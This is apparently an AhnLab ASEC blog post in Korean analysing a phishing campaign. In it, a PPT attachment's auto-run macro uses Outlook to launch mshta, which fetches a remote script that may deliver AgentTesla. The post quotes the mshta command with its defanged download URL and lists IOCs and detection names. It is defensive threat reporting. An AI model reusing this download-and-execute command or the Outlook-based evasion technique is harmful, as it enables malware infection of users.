Posted By ,

Outlook.exe 를 이용한 악성 PPT 매크로 유포 중

최근 ASEC 분석팀은 꾸준하게 유포되고 있는 악성 PPT 파일의 변형을 확인하였다. 기존과 동일하게 mshta.exe 를 이용하여 악성 스크립트를 실행하는 동작 방식으로, 중간 과정에서 outlook.exe 프로세스를 이용하는 방식이 추가되었다.

악성 PPT 파일은 아래와 같이 피싱 메일의 첨부 파일을 통해 유포되고 있으며, 구매 문의와 관련된 내용을 포함하고 있다. 또한 이전 유형과 동일하게 악성 PPT 파일은 PDF 확장자로 위장한 것을 확인할 수 있다.

  • 유포 파일명

Purchase Inquiry_pdf.ppt

악성 PPT 파일이 첨부된 피싱 메일

악성 PPT 파일을 실행시, 매크로 포함 여부를 선택하는 알림이 생성되며 매크로 포함 버튼을 선택하게 되면 악성 매크로가 실행된다.

악성 매크로 실행

악성 매크로는 간단한 코드로 이루어져 있으며, Auto_Open() 함수에 의해 자동으로 실행되는 형태이다. 이번 변형에서 추가된 부분으로 CreateObject(“Outlook.Application”) 을 통해 Outlook 응용 프로그램 개체를 생성하여 mshta 명령어를 실행한다.

악성 매크로 (1)
악성 매크로 (2)

최종적으로 outlook 프로세스에 의해 mshta 가 실행되며, 아래의 그림은 자사 RAPIT 시스템에서 확인되는 프로세스 트리이다.

자사 RAPIT 시스템에서 확인되는 프로세스 트리

mshta 명령어는 기존과 동일하게 악성 스크립트가 포함된 Blogspot 웹페이지로 연결되는 형태이다. 현재는 해당 웹페이지가 삭제되어 추가 악성 행위는 알 수 없지만, 악성 스크립트에 따라 AgentTesla 등 다양한 악성코드가 실행될 수 있다.

  • 악성 명령어

“C:\Windows\System32\mshta.exe” “hxxp://www.bitly.com/hdjalsdnbhagdehasd”

  • Final URL

hxxps://orkyakroonmeinkyukartaahunthekat1.blogspot.com/p/charles123uuu.html

outlook.exe 프로세스를 통해 악성 명령어를 실행하는 방식의 변형은 행위 탐지를 우회하기 위한 목적으로 추정된다. 현재 V3 에서는 아래와 같이 행위 탐지가 가능한 것을 확인할 수 있다.

V3 행위 탐지

피싱 메일을 통해 유포되는 악성 PPT 파일은 작년부터 꾸준히 유포되고 있어 사용자들의 각별한 주의가 필요하다. 또한 출처가 불분명한 메일의 첨부파일은 열람을 자제해야하며, 문서에 포함된 의심 매크로는 실행하지 않도록 주의해야 한다.

[파일 진단]

  • Downloader/PPT.Generic

[행위 진단]

  • Execution/MDP.Mshta.M3815

[IOC 정보]

  • 0769e2f9ed19847d1195aa1f31e7ed4a
  • hxxp://www.bitly.com/hdjalsdnbhagdehasd
  • hxxps://orkyakroonmeinkyukartaahunthekat1.blogspot.com/p/charles123uuu.html

 [기존 악성 PPT 관련 블로그]

지속적으로 유포되는 파워포인트 유형의 악성 첨부파일 – ASEC BLOG
지난 4월, 아래의 포스팅을 통해 PPT파일을 매개체로 하여 유포되는 악성코드에 대해 소개한 바 있다. ASEC 분석팀은 파워포인트 유형의 PPAM 파일을 이용한 악성 행위가 최근까지도 지속되는 것을 확인하여 이를 알리려 한다. 4월에 소개한 내용은 파워포인트에 포함된 매크로가 실행되면 mshta.exe를 이용하여 악성 스크립트가 삽입된 blogspot 웹페이지의 소스가 공격에 바로 사용되었으나, 이번에는 powershell.exe/wscript.exe를 이용한 프로세스가 추가되어 보다 더 복잡해진 것이 특징이라고 할 수 있다. V…
피싱메일에 첨부된 PPT 파일을 통해 유포되는 AgentTesla !! – ASEC BLOG
ASEC 분석팀은 피싱메일에 악성 파워포인트(*.PPT) 파일이 첨부되어 유포중인 것을 확인하였다. 악성코드가 유포되고 동작하는 방식은 ASEC 블로그를 통해 지속적으로 소개해왔던 방식에서 크게 벗어나지 않으며, 기존에 사용했던 방법들을 조합한 것이 특징이라고 할 수 있다. 지난 2020년 7월에 ASEC블로그에 소개한 내용(‘AgentTesla 악성코드 국내에 어떻게 유포되고 있나?’)은 공격자가 Pastebin 서비스를 사용하여 AgentTesla 를 유포한 것이며, 11월에 소개한 내용(‘국세청 ‘전자세금계산서’ 사칭한 Lok…
AgentTesla 악성코드 국내에 어떻게 유포되고 있나? – ASEC BLOG
올해 초부터 피싱 메일에 악성 파워포인트(*.PPT) 파일이 첨부되어 유포중인 사례가 확인되고 있다. ASEC 분석팀에서는 최근 이러한 공격 방식을 통해 AgentTesla가 최종 실행된 것을 포착하여 이에 대해 알리려한다. 해외에서는 아래 블로그처럼 해외에서도 올 1월 정보유출형 악성코드 azorult가 메일에 첨부된 PPT를 통해 유포되었다. (해외 블로그 : https://appriver.com/resources/blog/january-2020/powerpoint-malware-references-drake-lyrics-dro…

연관 IOC 및 관련 상세 분석 정보는 안랩의 차세대 위협 인텔리전스 플랫폼 ‘AhnLab TIP’ 구독 서비스를 통해 확인 가능하다.

Categories:악성코드 정보

Tagged as:,

0 0 votes
별점 주기
Subscribe
Notify of
guest

0 댓글
Inline Feedbacks
View all comments